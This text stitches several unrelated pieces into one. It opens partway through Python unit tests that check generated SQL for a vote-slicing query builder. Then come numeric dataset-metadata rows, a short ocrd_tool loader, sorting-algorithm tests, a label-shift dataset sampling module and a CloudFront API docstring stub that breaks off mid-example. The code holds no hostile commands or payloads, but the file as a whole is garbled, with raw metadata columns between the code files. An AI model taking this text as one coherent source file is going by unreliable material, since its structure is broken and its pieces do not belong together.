str(queries[1])) with self.subTest('base totals query is same as base query minus the totals dimension'): self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' 'NULL "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp","$d$political_party"', str(queries[2])) with self.subTest('reference total query is shifted without the totals dimension'): self.assertEqual('SELECT ' 'TRUNC(TIMESTAMPADD(\'day\',1,"timestamp"),\'DD\') "$d$timestamp",' 'NULL "$d$political_party",' 'SUM("votes") "$m$votes_dod" ' 'FROM "politics"."politician" ' 'WHERE TIMESTAMPADD(\'day\',1,"timestamp") BETWEEN \'2018-01-01\' AND \'2019-01-01\' ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp","$d$political_party"', str(queries[3])) def test_build_query_with_totals_dimension_and_total_filter_not_applied(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.political_party) \ .dimension(slicer.dimensions.timestamp.rollup()) \ .filter(slicer.dimensions.timestamp.between(date(2018, 1, 1), date(2019, 1, 1), False)) \ .queries self.assertEqual(len(queries), 2) with self.subTest('base query is same as without totals'): self.assertEqual('SELECT ' '"political_party" "$d$political_party",' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' ' 'GROUP BY "$d$political_party","$d$timestamp" ' 'ORDER BY "$d$political_party","$d$timestamp"', str(queries[0])) with self.subTest('base totals query is same as base query minus the totals dimension without filter'): self.assertEqual('SELECT ' '"political_party" "$d$political_party",' 'NULL "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$political_party" ' 'ORDER BY "$d$political_party","$d$timestamp"', str(queries[1])) def test_build_query_with_totals_dimension_and_two_filters_only_one_applied(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.political_party) \ .dimension(slicer.dimensions.timestamp.rollup()) \ .filter(slicer.dimensions.timestamp.between(date(2018, 1, 1), date(2019, 1, 1), False)) \ .filter(slicer.dimensions.timestamp.between(date(2018, 3, 1), date(2019, 9, 1), True)) \ .queries self.assertEqual(len(queries), 2) with self.subTest('base query is same as without totals with both filters'): self.assertEqual('SELECT ' '"political_party" "$d$political_party",' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' ' 'AND "timestamp" BETWEEN \'2018-03-01\' AND \'2019-09-01\' ' 'GROUP BY "$d$political_party","$d$timestamp" ' 'ORDER BY "$d$political_party","$d$timestamp"', str(queries[0])) with self.subTest('base totals query is same as base query minus the totals dimension with one filter'): self.assertEqual('SELECT ' '"political_party" "$d$political_party",' 'NULL "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'WHERE "timestamp" BETWEEN \'2018-03-01\' AND \'2019-09-01\' ' 'GROUP BY "$d$political_party" ' 'ORDER BY "$d$political_party","$d$timestamp"', str(queries[1])) def test_build_query_with_totals_dimensions_and_filter_applied_on_correct_total_dimension(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.political_party.rollup()) \ .dimension(slicer.dimensions.timestamp.rollup()) \ .filter(slicer.dimensions.timestamp.between(date(2018, 1, 1), date(2019, 1, 1), False)) \ .queries self.assertEqual(len(queries), 3) with self.subTest('base query is same as without totals'): self.assertEqual('SELECT ' '"political_party" "$d$political_party",' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' ' 'GROUP BY "$d$political_party","$d$timestamp" ' 'ORDER BY "$d$political_party","$d$timestamp"', str(queries[0])) with self.subTest('base totals query is same as base query minus the timestamp totals dimension'): self.assertEqual('SELECT ' '"political_party" "$d$political_party",' 'NULL "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$political_party" ' 'ORDER BY "$d$political_party","$d$timestamp"', str(queries[1])) with self.subTest('base totals query is same as base query minus the political party totals dimension'): self.assertEqual('SELECT ' 'NULL "$d$political_party",' 'NULL "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' ' 'ORDER BY "$d$political_party","$d$timestamp"', str(queries[2]))
50.900952
116
0.49826
2,453
26,723
5.314309
0.053812
0.095581
0.072492
0.038662
0.933185
0.930884
0.924977
0.915465
0.900123
0.883553
0
0.016718
0.366538
26,723
524
117
50.998092
0.753367
0.004453
0
0.829157
0
0
0.337243
0.116236
0
0
0
0
0.129841
1
0.047836
false
0
0.009112
0
0.066059
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
8cd184fbcd3012eace2dd34f722f5fe14c93926d
168
py
Python
align/ocrd_tool.py
kba/cis-ocrd-py
4b6d2a29ac82cf1ec734a87314a6c774271d09bc
[ "MIT" ]
26
2019-10-23T22:40:17.000Z
2022-03-04T11:32:51.000Z
align/ocrd_tool.py
kba/cis-ocrd-py
4b6d2a29ac82cf1ec734a87314a6c774271d09bc
[ "MIT" ]
64
2019-08-29T14:27:40.000Z
2022-03-25T15:23:21.000Z
align/ocrd_tool.py
kba/cis-ocrd-py
4b6d2a29ac82cf1ec734a87314a6c774271d09bc
[ "MIT" ]
7
2019-09-23T13:32:04.000Z
2021-04-15T11:46:48.000Z
import json from pkg_resources import resource_string def get_ocrd_tool(): return json.loads( resource_string(__name__, 'ocrd-tool.json').decode('utf8'))
21
67
0.738095
23
168
5
0.695652
0.243478
0
0
0
0
0
0
0
0
0
0.007042
0.154762
168
7
68
24
0.802817
0
0
0
0
0
0.107143
0
0
0
0
0
0
1
0.2
true
0
0.4
0.2
0.8
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
1
1
0
0
7
8cd82fc13db1d5e6801c11259b6980439d686acd
9,676
py
Python
tests/test_SortingAlgorithms.py
chrisphil335/structlinks
61aee24ec15c7caab9ce99e1f97ce30e7f21157c
[ "MIT" ]
9
2021-04-09T21:20:46.000Z
2022-03-25T12:14:43.000Z
tests/test_SortingAlgorithms.py
chrisphil335/structlinks
61aee24ec15c7caab9ce99e1f97ce30e7f21157c
[ "MIT" ]
19
2021-03-22T07:52:39.000Z
2021-04-07T20:04:05.000Z
tests/test_SortingAlgorithms.py
chrisphil335/structlinks
61aee24ec15c7caab9ce99e1f97ce30e7f21157c
[ "MIT" ]
7
2021-04-10T21:08:12.000Z
2022-03-20T12:55:23.000Z
"""This file contains tests for SortingAlgorithms.py. """ from SortingAlgorithms import * from LinkedList import * from DoublyLinkedList import * from typing import Optional, Callable ######################################## # Base tests for non-mutating sorts ######################################## class BaseNoMutatingSort: """The base class for a suit of tests that work with in place sorting algorithms. Inherit from this class and assign an algorithm to be used in the tests. """ algorithm: Callable[[], None] = staticmethod(None) def test_unsortedlist(self) -> None: """Test algorithm on an unsorted list""" test_list = [9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200] actual = self.algorithm(test_list) expected = sorted(test_list) assert actual == expected def test_sortedlist(self) -> None: """Test algorithm on a sorted list""" test_list = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10] actual = self.algorithm(test_list) expected = sorted(test_list) assert actual == expected def test_reversedlist(self) -> None: """Test algorithm on a reversed list""" test_list = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0] actual = self.algorithm(test_list) expected = sorted(test_list) assert actual == expected def test_key_reverse(self) -> None: """Test algorithm on a list, sort with a reversing key.""" test_list = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0] actual = self.algorithm(test_list, (lambda x: -x)) expected = sorted(test_list, key=(lambda x: -x)) assert actual == expected def test_unsorted_linked_list(self) -> None: """Test algorithm on an unsorted list""" test_list = LinkedList([9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200]) actual = self.algorithm(test_list).to_list() expected = sorted(test_list.to_list()) assert actual == expected def test_sorted_linked_list(self) -> None: """Test algorithm on a sorted list""" test_list = LinkedList([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]) actual = self.algorithm(test_list).to_list() expected = sorted(test_list.to_list()) assert actual == expected def test_reversed_linked_list(self) -> None: """Test algorithm on a reversed list""" test_list = LinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]) actual = self.algorithm(test_list).to_list() expected = sorted(test_list.to_list()) assert actual == expected def test_key_reverse_linked_list(self) -> None: """Test algorithm on a list, sort with a reversing key.""" test_list = LinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]) actual = self.algorithm(test_list, (lambda x: -x)).to_list() expected = sorted(test_list.to_list(), key=(lambda x: -x)) assert actual == expected def test_unsorted_doubly_linked_list(self) -> None: """Test algorithm on an unsorted list""" test_list = DoublyLinkedList([9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200]) actual = self.algorithm(test_list).to_list() expected = sorted(test_list.to_list()) assert actual == expected def test_sorted_doubly_linked_list(self) -> None: """Test algorithm on a sorted list""" test_list = DoublyLinkedList([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]) actual = self.algorithm(test_list).to_list() expected = sorted(test_list.to_list()) assert actual == expected def test_reversed_doubly_linked_list(self) -> None: """Test algorithm on a reversed list""" test_list = DoublyLinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]) actual = self.algorithm(test_list).to_list() expected = sorted(test_list.to_list()) assert actual == expected def test_key_reverse_doubly_linked_list(self) -> None: """Test algorithm on a list, sort with a reversing key.""" test_list = DoublyLinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]) actual = self.algorithm(test_list, (lambda x: -x)).to_list() expected = sorted(test_list.to_list(), key=(lambda x: -x)) assert actual == expected ######################################## # Base tests for mutating sorts ######################################## class BaseInPlaceSort: """The base class for a suit of tests that work with in place sorting algorithms. Inherit from this class and assign an algorithm to be used in the tests. """ algorithm: Callable[[], None] = staticmethod(None) def test_unsortedlist(self) -> None: """Test algorithm on an unsorted list""" test_list = [9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200] expected = sorted(test_list.copy()) self.algorithm(test_list) actual = test_list.copy() assert actual == expected def test_sortedlist(self) -> None: """Test algorithm on an sorted list""" test_list = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10] expected = sorted(test_list.copy()) self.algorithm(test_list) actual = test_list.copy() assert actual == expected def test_reversedlist(self) -> None: """Test algorithm on a reversed list""" test_list = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0] expected = sorted(test_list.copy()) self.algorithm(test_list) actual = test_list.copy() assert actual == expected def test_key_reverse(self) -> None: """Test algorithm on a list, sort with a reversing key.""" test_list = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0] self.algorithm(test_list, (lambda x: -x)) actual = test_list.copy() expected = sorted(test_list.copy(), key=(lambda x: -x)) assert actual == expected def test_unsorted_linked_list(self) -> None: """Test algorithm on an unsorted list""" test_list = LinkedList([9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200]) expected = sorted(test_list.to_list()) self.algorithm(test_list) actual = test_list.to_list() assert actual == expected def test_sorted_linked_list(self) -> None: """Test algorithm on an sorted list""" test_list = LinkedList([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]) expected = sorted(test_list.to_list()) self.algorithm(test_list) actual = test_list.to_list() assert actual == expected def test_reversed_linked_list(self) -> None: """Test algorithm on a reversed list""" test_list = LinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]) expected = sorted(test_list.to_list()) self.algorithm(test_list) actual = test_list.to_list() assert actual == expected def test_key_reverse_linked_list(self) -> None: """Test algorithm on a list, sort with a reversing key.""" test_list = LinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]) self.algorithm(test_list, (lambda x: -x)) actual = test_list.to_list() expected = sorted(test_list.to_list(), key=(lambda x: -x)) assert actual == expected def test_unsorted_doubly_linked_list(self) -> None: """Test algorithm on an unsorted list""" test_list = DoublyLinkedList([9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200]) expected = sorted(test_list.to_list()) self.algorithm(test_list) actual = test_list.to_list() assert actual == expected def test_sorted_doubly_linked_list(self) -> None: """Test algorithm on an sorted list""" test_list = DoublyLinkedList([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]) expected = sorted(test_list.to_list()) self.algorithm(test_list) actual = test_list.to_list() assert actual == expected def test_reversed_doubly_linked_list(self) -> None: """Test algorithm on a reversed list""" test_list = DoublyLinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]) expected = sorted(test_list.to_list()) self.algorithm(test_list) actual = test_list.to_list() assert actual == expected def test_key_reverse_doubly_linked_list(self) -> None: """Test algorithm on a list, sort with a reversing key.""" test_list = DoublyLinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]) self.algorithm(test_list, (lambda x: -x)) actual = test_list.to_list() expected = sorted(test_list.to_list(), key=(lambda x: -x)) assert actual == expected class TestNoMutatingMergesort(BaseNoMutatingSort): """Test the non-mutating mergesort algorithm""" algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(no_mut_mergesort) class TestInPlaceMergesort(BaseInPlaceSort): """Test the mutating mergesort algorithm""" algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(mergesort) class TestInPlaceQuicksort(BaseInPlaceSort): """Test the mutating quicksort algorithm""" algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(quicksort) class TestNoMutatingQuicksort(BaseNoMutatingSort): """Test the non-mutating quicksort algorithm""" algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(no_mut_quicksort) class TestInPlaceInsertionSort(BaseInPlaceSort): """Test the mutating insertionsort algorithm""" algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(insertion_sort) class TestInPlaceSelectionSort(BaseInPlaceSort): """Test the mutating selection sort algorithm""" algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(selection_sort)
33.597222
87
0.612133
1,303
9,676
4.398312
0.069839
0.117257
0.052347
0.073286
0.891467
0.877159
0.877159
0.877159
0.85657
0.85657
0
0.041941
0.245969
9,676
287
88
33.714286
0.743558
0.164634
0
0.861842
0
0
0
0
0
0
0
0
0.157895
1
0.157895
false
0
0.026316
0
0.289474
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
50a18c1f61487090a47f0df4b5ee4aeeaaabd106
16,797
py
Python
alsa/datasets/shift_transforms.py
QasimWani/alls
13c44ea8f0f4ee7b5bae419813713742a03a5742
[ "Unlicense", "MIT" ]
2
2021-08-10T20:20:38.000Z
2021-09-01T14:40:19.000Z
alsa/datasets/shift_transforms.py
QasimWani/alls
13c44ea8f0f4ee7b5bae419813713742a03a5742
[ "Unlicense", "MIT" ]
2
2021-05-03T09:53:05.000Z
2021-08-20T00:36:23.000Z
alsa/datasets/shift_transforms.py
QasimWani/alls
13c44ea8f0f4ee7b5bae419813713742a03a5742
[ "Unlicense", "MIT" ]
2
2021-12-14T02:16:27.000Z
2022-01-25T23:08:49.000Z
"""Resources for shifting datasets.""" import random import math import numpy as np def uniform_dataset(idxs_by_label, size, replace=True, verbose=True): """Uniformly distribute dataset.""" # Group data points by label if replace: # Sample size points from each cls_size = math.ceil(size / len(idxs_by_label)) for l in idxs_by_label: if idxs_by_label[l]: idxs = np.random.randint(0, len(idxs_by_label[l]), size=(cls_size, )) idxs_by_label[l] = [idxs_by_label[l][i] for i in idxs] else: # How many data points should we keep in classes? cls_size = min([len(v) for v in idxs_by_label.values()]) # Handle excess points if cls_size * len(idxs_by_label) > size: cls_size = math.ceil(size / len(idxs_by_label)) # Cut classes data points for l in idxs_by_label: idxs_by_label[l] = idxs_by_label[l][:cls_size] cls_composition = [ len(idxs_by_label[k]) for k in sorted(idxs_by_label.keys()) ] cls_composition = np.array(cls_composition, dtype=np.float32) if verbose: print("Class composition: ", cls_composition) # Build new dataset dataset = [] for v in idxs_by_label.values(): dataset += v random.shuffle(dataset) if verbose: print("Full dataset size: ", len(dataset)) return dataset def tweak_dataset(idxs_by_label, size, args, replace=True, verbose=True): """Adjust the likelihood of one specific class""" if replace: # Compute tweak size tweak_size = math.ceil(args.tweak_prop * size) other_size = math.ceil(size * (1 - args.tweak_prop) / (len(idxs_by_label) - 1)) # Cut classes data points for l in idxs_by_label: if idxs_by_label[l]: if l == args.tweak_label: idxs = np.random.randint(0, len(idxs_by_label[l]), size=(tweak_size, )) else: idxs = np.random.randint(0, len(idxs_by_label[l]), size=(other_size, )) idxs_by_label[l] = [idxs_by_label[l][i] for i in idxs] else: # How many data points should we keep in classes? new_size = len(idxs_by_label[args.tweak_label]) / args.tweak_prop if new_size > size: new_size = size other_size = math.ceil(new_size * (1 - args.tweak_prop) / (len(idxs_by_label) - 1)) # Cut classes data points for l in idxs_by_label: if l != args.tweak_label: idxs_by_label[l] = idxs_by_label[l][:other_size + 1] cls_composition = [ len(idxs_by_label[k]) for k in sorted(idxs_by_label.keys()) ] cls_composition = np.array(cls_composition, dtype=np.float32) if verbose: print("Class composition: ", cls_composition) # Build new dataset dataset = [] for v in idxs_by_label.values(): dataset += v random.shuffle(dataset) if verbose: print("Full dataset size: ", len(dataset)) return dataset def dirichlet_dataset(idxs_by_label, size, args, replace=True, verbose=True, distribution=None): """Shift dataset with prior sampled from Dirichlet distribution.""" # Compute distribution if not provided if distribution is None: distribution = np.random.dirichlet([args.dirichlet_alpha] * len(idxs_by_label), size=()) # Group data points by label if replace: for l in idxs_by_label: cls_size = math.ceil(size * distribution[l]) if not cls_size: cls_size = 1 if idxs_by_label[l]: idxs = np.random.randint(0, len(idxs_by_label[l]), size=(cls_size, )) idxs_by_label[l] = [idxs_by_label[l][i] for i in idxs] else: # Find resulting dataset size dataset_sizes = [] for l in idxs_by_label.items(): dataset_sizes.append(len(idxs_by_label[l]) / distribution[l]) new_size = min(dataset_sizes) # Handle excess points if new_size > size: new_size = size # Cut classes data points for l in idxs_by_label: cls_size = math.ceil(new_size * distribution[l]) if not cls_size: cls_size = 1 idxs_by_label[l] = idxs_by_label[l][:cls_size] cls_composition = [ len(idxs_by_label[k]) for k in sorted(idxs_by_label.keys()) ] cls_composition = np.array(cls_composition, dtype=np.float32) if verbose: print("Class composition: ", cls_composition) # Build new dataset dataset = [] for v in idxs_by_label.values(): dataset += v random.shuffle(dataset) if verbose: print("Full dataset size: ", len(dataset)) return dataset, distribution def shift_dataset(args, warmstart_idxs_by_label, online_idxs_by_label, test_idxs_by_label): """Shift source and target according to arg rules.""" # Transform datasets warmstart_size = int(args.dataset_cap * (args.warmstart_ratio / (args.warmstart_ratio + 1))) online_size = args.dataset_cap - warmstart_size test_size = online_size if args.dataset == "nabirds": test_size = 5000 # test_size = sum([len(x) for x in test_idxs_by_label.values()]) if args.shift_strategy == "dirichlet": # Dirichlet source, uniform target/test warmstart_idxs, p = dirichlet_dataset(warmstart_idxs_by_label, warmstart_size, args) online_idxs = uniform_dataset(online_idxs_by_label, online_size) test_idxs = uniform_dataset(test_idxs_by_label, test_size) elif args.shift_strategy == "tweak": # Tweak source, uniform target/test warmstart_idxs = tweak_dataset(warmstart_idxs_by_label, warmstart_size, args) online_idxs = uniform_dataset(online_idxs_by_label, online_size) test_idxs = uniform_dataset(test_idxs_by_label, test_size) elif args.shift_strategy == "trulynone": warmstart_idxs = np.concatenate(list(warmstart_idxs_by_label.values())) np.random.shuffle(warmstart_idxs) warmstart_idxs = warmstart_idxs[:warmstart_size] online_idxs = np.concatenate(list(online_idxs_by_label.values())) np.random.shuffle(online_idxs) online_idxs = online_idxs[:online_size] print("warmstart", [len(x) for x in warmstart_idxs_by_label.values()]) print("online", [len(x) for x in online_idxs_by_label.values()]) test_idxs = uniform_dataset(test_idxs_by_label, test_size) elif args.shift_strategy == "trulyregion": warmstart_idxs = np.concatenate(list(warmstart_idxs_by_label.values())) np.random.shuffle(warmstart_idxs) warmstart_idxs = warmstart_idxs[:warmstart_size] print("warmstart", [len(x) for x in warmstart_idxs_by_label.values()]) online_idxs, p = dirichlet_dataset(online_idxs_by_label, online_size, args) test_idxs, p = dirichlet_dataset(test_idxs_by_label, test_size, args, distribution=p) elif args.shift_strategy == "none": # Uniform source, uniform target/test warmstart_idxs = uniform_dataset(warmstart_idxs_by_label, warmstart_size) online_idxs = uniform_dataset(online_idxs_by_label, online_size) test_idxs = uniform_dataset(test_idxs_by_label, test_size) elif args.shift_strategy == "dirichlet_target": # Uniform source, dirichlet target/test warmstart_idxs = uniform_dataset(warmstart_idxs_by_label, warmstart_size) online_idxs, p = dirichlet_dataset(online_idxs_by_label, online_size, args) test_idxs, p = dirichlet_dataset(test_idxs_by_label, test_size, args, distribution=p) elif args.shift_strategy == "dirichlet_online_target": # Uniform source, dirichlet target/test warmstart_idxs = uniform_dataset(warmstart_idxs_by_label, warmstart_size) online_idxs = uniform_dataset(online_idxs_by_label, online_size) test_idxs, p = dirichlet_dataset(test_idxs_by_label, test_size, args) elif args.shift_strategy == "dirichlet_identical": # Dirichlet source, dirichlet target/test (identical p) warmstart_idxs, p = dirichlet_dataset(warmstart_idxs_by_label, warmstart_size, args) online_idxs, p = dirichlet_dataset(online_idxs_by_label, online_size, args, distribution=p) test_idxs, p = dirichlet_dataset(test_idxs_by_label, test_size, args, distribution=p) elif args.shift_strategy == "dirichlet_mix": # Dirichlet source, dirichlet target/test (different p) warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label, warmstart_size, args) online_idxs, p = dirichlet_dataset(online_idxs_by_label, online_size, args) test_idxs, p = dirichlet_dataset(test_idxs_by_label, test_size, args, distribution=p) elif args.shift_strategy == "dirichlet_online": # Dirichlet source, dirichlet target/test (different p) warmstart_idxs, p = dirichlet_dataset(warmstart_idxs_by_label, warmstart_size, args) online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size, args) test_idxs, _ = dirichlet_dataset(test_idxs_by_label, test_size, args, distribution=p) elif args.shift_strategy == "dirichlet_general_eric": # Dirichlet source, dirichlet target/test (different p) args.dirichlet_alpha = 3.0 warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label, warmstart_size, args) args.dirichlet_alpha = 3.0 online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size, args) args.dirichlet_alpha = 0.7 test_idxs, _ = dirichlet_dataset(test_idxs_by_label, test_size, args) elif args.shift_strategy == "dirichlet_general_eric22": # Dirichlet source, dirichlet target/test (different p) args.dirichlet_alpha = 1.0 warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label, warmstart_size, args) args.dirichlet_alpha = 1.0 online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size, args) args.dirichlet_alpha = 0.4 test_idxs, _ = dirichlet_dataset(test_idxs_by_label, test_size, args) elif args.shift_strategy == "dirichlet_general_eric21": # Dirichlet source, dirichlet target/test (different p) args.dirichlet_alpha = 2.0 warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label, warmstart_size, args) args.dirichlet_alpha = 2.0 online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size, args) args.dirichlet_alpha = 0.4 test_idxs, _ = dirichlet_dataset(test_idxs_by_label, test_size, args) elif args.shift_strategy == "dirichlet_general_eric2": # Dirichlet source, dirichlet target/test (different p) args.dirichlet_alpha = 3.0 warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label, warmstart_size, args) args.dirichlet_alpha = 3.0 online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size, args) args.dirichlet_alpha = 0.4 test_idxs, _ = dirichlet_dataset(test_idxs_by_label, test_size, args) elif args.shift_strategy == "dirichlet_general_eric3": # Dirichlet source, dirichlet target/test (different p) args.dirichlet_alpha = 3.0 warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label, warmstart_size, args) args.dirichlet_alpha = 3.0 online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size, args) args.dirichlet_alpha = 1.5 test_idxs, _ = dirichlet_dataset(test_idxs_by_label, test_size, args) elif args.shift_strategy == "dirichlet_general": # Dirichlet source, dirichlet target/test (different p) args.dirichlet_alpha = 3.0 warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label, warmstart_size, args) args.dirichlet_alpha = 3.0 online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size, args) args.dirichlet_alpha = 0.1 test_idxs, _ = dirichlet_dataset(test_idxs_by_label, test_size, args) elif args.shift_strategy == "dirichlet_general3": # Dirichlet source, dirichlet target/test (different p) warmstart_idxs, p = dirichlet_dataset(warmstart_idxs_by_label, warmstart_size, args) args.dirichlet_alpha = 3.0 online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size, args) test_idxs, _ = dirichlet_dataset(test_idxs_by_label, test_size, args, distribution=p) elif args.shift_strategy == "dirichlet_general4": # Dirichlet source, dirichlet target/test (different p) warmstart_idxs = uniform_dataset(warmstart_idxs_by_label, warmstart_size, args) online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size, args) args.dirichlet_alpha = 0.4 test_idxs, _ = dirichlet_dataset(test_idxs_by_label, test_size, args) elif args.shift_strategy == "dirichlet_online_source": # Dirichlet source, dirichlet target/test (different p) warmstart_idxs = uniform_dataset(warmstart_idxs_by_label, warmstart_size, args) online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size, args) test_idxs = uniform_dataset(test_idxs_by_label, test_size, args) else: raise ValueError() return warmstart_idxs, online_idxs, test_idxs
46.019178
79
0.548431
1,783
16,797
4.819966
0.075715
0.092041
0.142076
0.051199
0.858622
0.827205
0.811962
0.792762
0.792297
0.776123
0
0.006728
0.380544
16,797
364
80
46.145604
0.819222
0.094422
0
0.742373
0
0
0.030495
0.010693
0
0
0
0
0
1
0.013559
false
0
0.010169
0
0.037288
0.030508
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
50a1f101898a950e1e51d117cfc99f3cfd859734
330,941
py
Python
pyboto3/cloudfront.py
thecraftman/pyboto3
653a0db2b00b06708334431da8f169d1f7c7734f
[ "MIT" ]
null
null
null
pyboto3/cloudfront.py
thecraftman/pyboto3
653a0db2b00b06708334431da8f169d1f7c7734f
[ "MIT" ]
null
null
null
pyboto3/cloudfront.py
thecraftman/pyboto3
653a0db2b00b06708334431da8f169d1f7c7734f
[ "MIT" ]
null
null
null
''' The MIT License (MIT) Copyright (c) 2016 WavyCloud Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ''' def can_paginate(operation_name=None): """ Check if an operation can be paginated. :type operation_name: string :param operation_name: The operation name. This is the same name as the method name on the client. For example, if the method name is create_foo, and you'd normally invoke the operation as client.create_foo(**kwargs), if the create_foo operation can be paginated, you can use the call client.get_paginator('create_foo'). """ pass def create_cloud_front_origin_access_identity(CloudFrontOriginAccessIdentityConfig=None): """ Creates a new origin access identity. If you're using Amazon S3 for your origin, you can use an origin access identity to require users to access your content using a CloudFront URL instead of the Amazon S3 URL. For more information about how to use origin access identities, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide . See also: AWS API Documentation :example: response = client.create_cloud_front_origin_access_identity( CloudFrontOriginAccessIdentityConfig={ 'CallerReference': 'string', 'Comment': 'string' } ) :type CloudFrontOriginAccessIdentityConfig: dict :param CloudFrontOriginAccessIdentityConfig: [REQUIRED] The current configuration information for the identity. CallerReference (string) -- [REQUIRED]A unique number that ensures the request can't be replayed. If the CallerReference is new (no matter the content of the CloudFrontOriginAccessIdentityConfig object), a new origin access identity is created. If the CallerReference is a value already sent in a previous identity request, and the content of the CloudFrontOriginAccessIdentityConfig is identical to the original request (ignoring white space), the response includes the same information returned to the original request. If the CallerReference is a value you already sent in a previous request to create an identity, but the content of the CloudFrontOriginAccessIdentityConfig is different from the original request, CloudFront returns a CloudFrontOriginAccessIdentityAlreadyExists error. Comment (string) -- [REQUIRED]Any comments you want to include about the origin access identity. :rtype: dict :return: { 